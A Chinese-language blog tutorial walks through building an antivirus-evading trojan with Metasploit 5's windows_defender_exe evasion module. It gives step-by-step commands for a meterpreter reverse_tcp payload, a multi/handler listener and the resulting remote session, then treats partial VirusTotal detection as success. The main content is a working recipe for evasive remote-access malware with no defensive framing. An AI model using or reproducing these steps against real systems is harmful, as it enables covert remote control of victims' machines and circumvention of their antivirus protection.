使用metasploit中Evasion模塊

簡介

幾天前我說了kali此次更新我最關心的是metasploit升級到了5.0，5.0中有一個新的模塊叫Evasion模塊，這個模塊能夠輕鬆的建立反殺毒軟件的木馬，今天咱們就來試一試

操做

首先打開metasploit

msfconsole

你會看到下面這個界面

➜  ~ msfconsole
This copy of metasploit-framework is more than two weeks old.
 Consider running 'msfupdate' to update to the latest version.



      .:okOOOkdc'           'cdkOOOko:.
    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.
   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:
  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
  oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
  dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
  lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
  .OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
   cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
    oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
     lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
      ;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
       .dOOo'WM.OOOOocccxOOOO.MX'xOOd.
         ,kOl'M.OOOOOOOOOOOOO.M'dOk,
           :kk;.OOOOOOOOOOOOO.;Ok:
             ;kOOOOOOOOOOOOOOOk:
               ,xOOOOOOOOOOOx,
                 .lOOOOOOOl.
                    ,dOd,
                      .

       =[ metasploit v5.0.2-dev-c808cbe0509d4e8819879c6e1ed8bda45c34a19f]
+ -- --=[ 1851 exploits - 1046 auxiliary - 321 post       ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]
+ -- --=[ ** This is Metasploit 5 development branch **   ]

以後使用evasion模塊，首先看看有什麼evasion模塊

msf5 > show evasion

evasion
=======

   Name                             Disclosure Date  Rank    Check  Description
   ----                             ---------------  ----    -----  -----------
   windows/windows_defender_exe                      normal  No     Microsoft Windows Defender Evasive Executable
   windows/windows_defender_js_hta                   normal  No     Microsoft Windows Defender Evasive JS.Net and HTA

使用windows/windows_defender_exe這個模塊

use windows/windows_defender_exe

查看要配置的參數

show options

msf5 evasion(windows/windows_defender_exe) > show options

Module options (evasion/windows/windows_defender_exe):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  oDlIipoP.exe     yes       Filename for the evasive file (default: random)


Evasion target:

   Id  Name
   --  ----
   0   Microsoft Windows

就一個文件名參數能夠配置

set FILENAME bboysoul.exe

以後使用reverse_tcp payload

set payload windows/meterpreter/reverse_tcp

設置端口和ip

set LHOST 10.10.10.186

set LPORT 4444

生成木馬文件

exploit

以後打開一個監聽端口

use multi/handler

設置payload

set payload windows/meterpreter/reverse_tcp

設置主機和端口

set LHOST 10.10.10.186

set LPORT 4444

執行

exploit

接着咱們把生成出來的木馬在遠端要被控制的windows機器上運行咱們這裏就能夠接收到這個回話了

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.10.186:4444

^@[*] Sending stage (179779 bytes) to 10.10.10.167
[*] Meterpreter session 1 opened (10.10.10.186:4444 -> 10.10.10.167:52882) at 2019-02-23 13:37:14 +0800

上面都是常規操做，以後咱們掃描病毒

打開

www.virustotal.com

放入文件掃描

只有33個病毒引擎掃描出來了，說明還能夠

歡迎關注Bboysoul的博客www.bboysoul.com

Have Fun